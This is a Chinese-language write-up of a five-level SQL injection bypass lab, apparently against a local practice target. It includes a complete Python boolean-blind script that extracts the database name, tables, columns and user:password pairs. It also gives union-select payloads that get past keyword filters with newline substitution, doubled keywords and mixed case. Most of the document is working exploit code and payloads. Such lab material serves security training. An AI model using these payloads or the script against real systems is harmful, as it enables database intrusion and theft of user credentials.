1、第一关
http://sqli.bypass/index1.php
单引号报错id=1'
双引号正常id=1'',应该是单引号闭合
id=1'--+注释符用不了,%20和+都用不了
%0a可以用
没有报错,用布尔盲注,POC:id=1'%0aand%0asubstr('ss',1,1)='s'%0aand%0a'1'='1
脚本跑数据比较方便
import string
from time import time, sleep  # imported but never used below
import requests

# Candidate character set for the boolean-blind inference below: digits,
# lowercase letters and a short list of punctuation. "UNHEX('2D')" is a SQL
# expression for '-' rather than a literal; it gets special handling in the
# last loop because it must not be wrapped in quotes.
numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
letters2 = list(string.ascii_lowercase)
fuhao = ["@", "$", "^", "(", ")", "_", "UNHEX('2D')", ",", ".", "{", "}", "[", "]", ":", ";", "|"]

if __name__ == '__main__':
    test = True  # never read anywhere below
    # (original note: get the correct-response content length) — nothing
    # below measures a length; the oracle used instead is a fixed substring
    # of the response body, see the `in res.text` checks.
    # Base URL for the lab target: the id value is closed with a single quote
    # and followed by %0a, the whitespace substitute the notes above describe.
    url = "http://sqli.bypass/index1.php?id=1'%0a"
    list1 = numbers + letters2 + fuhao

    # Each extraction loop below has the same shape: for each string position
    # p, try every candidate a; a hit is recognised by the literal
    # "Your Login name:admin" appearing in the page. `num` counts consecutive
    # misses and the outer loop stops once it exceeds twice the alphabet size,
    # i.e. a whole position produced no hit (end of the string reached).
    # NOTE: this costs up to len(list1) GET requests per character, all
    # identical except for the p/a values — thousands of near-duplicate
    # requests to one URL, a pattern that stands out in access logs.

    # Get the database name
    database = ""
    num = 0
    print(f"数据库:")
    for p in range(50):
        if num > len(list1) * 2:
            break
        for a in list1:
            num += 1
            url_db = url + f"and(substr(database(),{p},1)='{a}')%0aand%0a'1'='1"
            res = requests.get(url_db)
            if "Your Login name:admin" in res.text:
                database = f"{database}{a}"
                print(a, end='')
                num = 0
    print("")

    # Get all table names (comma-joined by group_concat) for that database
    num = 0
    tables = ""
    print(f"所有表名:")
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            # Mixed-case keywords and parenthesised clauses are reproduced
            # as written; %26 in the next loop is a URL-encoded '&'.
            url_db = url + f"and(substr((SelEct(group_concat(table_name))from(information_schema.tables)where(table_schema='{database}')),{p},1)='{a}')%0aand%0a'1'='1"
            num += 1
            res = requests.get(url_db)
            if "Your Login name:admin" in res.text:
                tables = f"{tables}{a}"
                print(a, end='')
                num = 0
    print("")

    # Get all column names of the users table
    columns = ""
    print(f"users表所有字段名:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            url_db = url + f"and(substr((sEleCt(group_concat(column_name))from(information_schema.columns)where(table_schema='{database}')%26(table_name='users')),{p},1)='{a}')%0aand%0a'1'='1"
            num += 1
            res = requests.get(url_db)
            if "Your Login name:admin" in res.text:
                columns = f"{columns}{a}"
                print(a, end='')
                num = 0
    print("")  # newline

    # Pick the column whose name contains "secret"; `zd` is computed but
    # not referenced by anything below (the last loop hard-codes
    # user/password).
    zds = columns.split(",")
    zd = ""
    for a in zds:
        if "secret" in a:
            zd = a

    # Get all account rows as user:password pairs.
    # `tables` is the whole comma-joined list from the previous step and is
    # interpolated unchanged into the FROM clause.
    users = ""
    print(f"所有账号密码数据:")
    num = 0
    for p in range(1000):
        if num > len(list1) * 2:
            break
        for a in list1:
            if a == "UNHEX('2D')":
                # SQL expression, so no surrounding quotes
                url_db = url + f"and(substr((selEcT(group_concat(user,':',password))from({tables})),{p},1)={a})%0aand%0a'1'='1"
            else:
                url_db = url + f"and(substr((selEcT(group_concat(user,':',password))from({tables})),{p},1)='{a}')%0aand%0a'1'='1"
            num += 1
            res = requests.get(url_db)
            if "Your Login name:admin" in res.text:
                if a == "UNHEX('2D')":
                    a = '-'  # record the character the expression stands for
                users = f"{users}{a}"
                print(a, end='')
                num = 0
2、第二关
输入1查询,抓包
应该还是单引号闭合,and和or被过滤
试一下like,没被过滤
POC:id=-1'+union+select+1,2,3,4,5,6,7,'13
id=-1'+union+select+1,2,3,4,database(),6,7,'13
-1' union select 1,2,3,4,(select group_concat(table_name) from infORmation_schema.tables where table_schema='dvwa'),6,7,'13
id=-1' union select 1,2,3,4,(select group_concat(column_name) from infORmation_schema.columns where table_schema='dvwa'+AND+table_name='users'),6,7,'13
id=-1' union select 1,2,3,4,(select group_concat(user,'~',passwOrd) from dvwa.users),6,7,'13
3、第三关
单引号闭合
8列数据
显示位4和5
id=-1' union select 1,2,3,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database()),6,7,8--+
id=-1' union select 1,2,3,database(),(select group_concat(column_name) from information_schema.columns where table_schema='dvwa' aandnd table_name='users'),6,7,8--+
and和or替换为空了,可以双写绕过
id=-1' union select 1,2,3,database(),(select group_concat(user,'~',password) from dvwa.users),6,7,8--+
4、第四关
和前面几关一样也是单引号闭合,看下过滤了啥
id=-1' union select 1,2,3,4,5,6,7,8--+
union和select没过滤,可以查到显示位
提示检测到sql注入
id=-1' union select 1,2,3,database(),5,6,7,8--+
这个检测and和or,所以information_schema里包含了or没法用了
id=-1' union select 1,2,3,user(),version(),6,7,8--+
5、第五关
单引号有报错
还是单引号闭合
id=1' union select 1,2,3,4,5,6,7,8--+
报错了,应该是啥被过滤掉了,试试双写绕过
id=-1' ununionion selselect ect 1,2,3,4,5,6,7,8--+
那就好办了
id=-1' ununionion selselect ect 1,2,3,datadatabasebase(),5,6,7,8--+
id=-1' ununionion selselect ect 1,2,3,4,(selselect ect group_concat(table_name) frofromm infoorrmation_schema.tables w where here table_schema like '%dvwa'),6,7,8--+
id=-1' ununionion selselect ect 1,2,3,4,(selselect ect group_concat(column_name) frofromm infoorrmation_schema.columns w where here table_schema like 'dvwa' anandd table_name like '%uusersers'),6,7,8--+
id=-1' ununionion selselect ect 1,2,3,4,(selselect ect group_concat(ususerer,':',passwoorrd) frofromm uusersers),6,7,8--+
这个参数需要不停的尝试